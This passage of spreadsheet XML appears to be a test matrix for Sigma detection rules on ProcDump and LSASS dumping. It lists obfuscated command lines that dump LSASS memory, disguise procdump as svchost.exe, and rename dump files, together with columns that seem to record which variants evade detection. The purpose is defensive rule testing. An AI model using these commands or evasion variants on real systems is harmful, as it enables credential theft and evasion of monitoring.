      <c r="E949" s="36" t="inlineStr">
        <is>
          <t>robocopy C:\Sysinternals C:\temp procdump.exe</t>
        </is>
      </c>
      <c r="F949" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G949" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H949" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I949" s="36" t="n"/>
      <c r="J949" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K949" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="950" ht="15.75" customHeight="1" s="42">
      <c r="A950" s="43" t="n"/>
      <c r="B950" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C950" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D950" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E950" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c ren procdump.exe pd.exe</t>
        </is>
      </c>
      <c r="F950" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G950" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H950" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I950" s="36" t="n"/>
      <c r="J950" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K950" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="951" ht="15.75" customHeight="1" s="42">
      <c r="A951" s="43" t="n"/>
      <c r="B951" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C951" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D951" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E951" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" c^opy procdump64.exe C:\temp\svchost.exe</t>
        </is>
      </c>
      <c r="F951" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G951" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H951" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I951" s="43" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J951" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K951" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="952" ht="15.75" customHeight="1" s="42">
      <c r="A952" s="43" t="n"/>
      <c r="B952" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C952" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D952" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E952" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" c^opy procdump64.exe C:\temp\svchost.exe</t>
        </is>
      </c>
      <c r="F952" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G952" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H952" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I952" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J952" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K952" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="953" ht="15.75" customHeight="1" s="42">
      <c r="A953" s="43" t="n"/>
      <c r="B953" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C953" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D953" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E953" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C c^opy procdump64.exe C:\temp\svchost.exe</t>
        </is>
      </c>
      <c r="F953" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G953" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H953" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I953" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion (79b06761-465f-4f88-9ef2-150e24d3d737)</t>
        </is>
      </c>
      <c r="J953" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K953" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="954" ht="15.75" customHeight="1" s="42">
      <c r="A954" s="43" t="n"/>
      <c r="B954" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C954" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D954" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E954" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c type lsass.exe_220512_103022.dmp &gt; C:\temp\out.bin</t>
        </is>
      </c>
      <c r="F954" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G954" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H954" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I954" s="36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954" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K954" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="955" ht="15.75" customHeight="1" s="42">
      <c r="A955" s="43" t="n"/>
      <c r="B955" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C955" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D955" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E955" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C type lsass.exe_220512_103022.dmp &gt; C:\temp\out.bin</t>
        </is>
      </c>
      <c r="F955" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G955" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H955" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I955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955" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K955" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="956" ht="15.75" customHeight="1" s="42">
      <c r="A956" s="43" t="n"/>
      <c r="B956" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C956" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D956" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E956" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" type lsass.exe_220512_103022.dmp &gt; C:\temp\out.bin</t>
        </is>
      </c>
      <c r="F956" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G956" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H956" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I956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956" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K956" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="957" ht="15.75" customHeight="1" s="42">
      <c r="A957" s="43" t="n"/>
      <c r="B957" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C957" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D957" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E957" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" type lsass.exe_220512_103022.dmp &gt; C:\temp\out.bin</t>
        </is>
      </c>
      <c r="F957" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G957" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H957" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I957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957" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K957" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="958" ht="15.75" customHeight="1" s="42">
      <c r="A958" s="43" t="n"/>
      <c r="B958" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C958" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D958" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E958" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F958" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G958" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H958" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I958" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J958" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K958" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="959" ht="15.75" customHeight="1" s="42">
      <c r="A959" s="43" t="n"/>
      <c r="B959" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C959" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D959" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E959" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F959" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G959" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H959" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I959" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J959" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K959" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="960" ht="15.75" customHeight="1" s="42">
      <c r="A960" s="43" t="n"/>
      <c r="B960" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C960" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D960" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E960" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F960" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G960" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H960" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I960" s="36" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J960" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K960" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="961" ht="15.75" customHeight="1" s="42">
      <c r="A961" s="43" t="n"/>
      <c r="B961" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C961" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D961" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E961" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -commAND "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F961" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G961" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H961" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I961" s="36" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J961" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K961" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="962" ht="15.75" customHeight="1" s="42">
      <c r="A962" s="43" t="n"/>
      <c r="B962" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C962" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D962" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E962" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAND "Move-Item -Path .\lsass.exe_*.dmp -Destination C:\temp\dump.bin"</t>
        </is>
      </c>
      <c r="F962" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G962" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H962" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I962" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J962" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K962" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="963" ht="15.75" customHeight="1" s="42">
      <c r="A963" s="43" t="n"/>
      <c r="B963" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C963" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D963" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E963" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F963" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G963" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H963" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I963" s="36" t="n"/>
      <c r="J963" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K963" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="964" ht="15.75" customHeight="1" s="42">
      <c r="A964" s="43" t="n"/>
      <c r="B964" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C964" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D964" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E964" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F964" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G964" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H964" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I964" s="36" t="n"/>
      <c r="J964" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K964" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="965" ht="15.75" customHeight="1" s="42">
      <c r="A965" s="43" t="n"/>
      <c r="B965" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C965" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D965" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E965" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAND "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F965" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G965" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H965" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I965" s="43" t="n"/>
      <c r="J965" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K965" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="966" ht="15.75" customHeight="1" s="42">
      <c r="A966" s="43" t="n"/>
      <c r="B966" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C966" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D966" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E966" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F966" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G966" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H966" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I966" s="36" t="n"/>
      <c r="J966" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K966" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="967" ht="15.75" customHeight="1" s="42">
      <c r="A967" s="43" t="n"/>
      <c r="B967" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C967" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D967" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E967" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAND "Copy-Item .\procdump.exe -Destination .\sysdiag.exe"</t>
        </is>
      </c>
      <c r="F967" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G967" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H967" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I967" s="43" t="n"/>
      <c r="J967" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K967" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="968" ht="15.75" customHeight="1" s="42">
      <c r="A968" s="43" t="n"/>
      <c r="B968" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C968" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D968" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E968" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F968" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G968" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H968" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I968" s="36" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J968" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K968" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="969" ht="15.75" customHeight="1" s="42">
      <c r="A969" s="43" t="n"/>
      <c r="B969" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C969" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D969" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E969" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmANd "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F969" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G969" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H969" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I969" s="43" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J969" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K969" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="970" ht="15.75" customHeight="1" s="42">
      <c r="A970" s="43" t="n"/>
      <c r="B970" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C970" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D970" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E970" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F970" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G970" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H970" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I970" s="36" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J970" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K970" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="971" ht="15.75" customHeight="1" s="42">
      <c r="A971" s="43" t="n"/>
      <c r="B971" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C971" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D971" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E971" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmanD "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F971" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G971" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H971" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I971" s="36" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J971" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K971" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="972" ht="15.75" customHeight="1" s="42">
      <c r="A972" s="43" t="n"/>
      <c r="B972" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_evasion</t>
        </is>
      </c>
      <c r="C972" s="36" t="inlineStr">
        <is>
          <t>Potential SysInternals ProcDump Evasion</t>
        </is>
      </c>
      <c r="D972" s="36" t="inlineStr">
        <is>
          <t>79b06761-465f-4f88-9ef2-150e24d3d737</t>
        </is>
      </c>
      <c r="E972" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMaND "Move-Item -Path .\lsass.exe_220111_085234.dmp -Destination .\app_crash.log"</t>
        </is>
      </c>
      <c r="F972" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G972" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H972" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I972" s="36" t="inlineStr">
        <is>
          <t>LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e)</t>
        </is>
      </c>
      <c r="J972" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K972" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="973" ht="15.75" customHeight="1" s="42">
      <c r="A973" s="43" t="n"/>
      <c r="B973" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_lsass</t>
        </is>
      </c>
      <c r="C973" s="36" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump</t>
        </is>
      </c>
      <c r="D973" s="36" t="inlineStr">
        <is>
          <t>5afee48e-67dd-4e03-a783-f74259dcf998</t>
        </is>
      </c>
      <c r="E973" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" procdump.exe -m^a l^sass.exe C:\temp\dump.bin</t>
        </is>
      </c>
      <c r="F973" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G973" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H973" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I973" s="36" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump (5afee48e-67dd-4e03-a783-f74259dcf998)</t>
        </is>
      </c>
      <c r="J973" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K973" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="974" ht="15.75" customHeight="1" s="42">
      <c r="A974" s="43" t="n"/>
      <c r="B974" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_lsass</t>
        </is>
      </c>
      <c r="C974" s="36" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump</t>
        </is>
      </c>
      <c r="D974" s="36" t="inlineStr">
        <is>
          <t>5afee48e-67dd-4e03-a783-f74259dcf998</t>
        </is>
      </c>
      <c r="E974" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" procdump.exe -"m^a" l^sass.exe C:\temp\dump.bin</t>
        </is>
      </c>
      <c r="F974" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G974" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H974" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I974" s="36" t="n"/>
      <c r="J974" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K974" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="975" ht="15.75" customHeight="1" s="42">
      <c r="A975" s="43" t="n"/>
      <c r="B975" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_procdump_lsass</t>
        </is>
      </c>
      <c r="C975" s="36" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump</t>
        </is>
      </c>
      <c r="D975" s="36" t="inlineStr">
        <is>
          <t>5afee48e-67dd-4e03-a783-f74259dcf998</t>
        </is>
      </c>
      <c r="E975" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" procdump.exe -m^a l^sass.exe C:\temp\dump.bin</t>
        </is>
      </c>
      <c r="F975" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G975" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H975" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I975" s="43" t="inlineStr">
        <is>
          <t>Potential LSASS Process Dump Via Procdump (5afee48e-67dd-4e03-a783-f74259dcf998)</t>
        </is>
      </c>
      <c r="J975" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K975" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="976" ht="15.75" customHeight="1" s="42">
      <c r="A976" s="43" t="n"/>
      <c r="B976" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_werfault_reflect_debugger_exec</t>
        </is>
      </c>
      <c r="C976" s="36" t="inlineStr">
        <is>
          <t>Potential ReflectDebugger Content Execution Via WerFault.EXE</t>
        </is>
      </c>
      <c r="D976" s="36" t="inlineStr">
        <is>
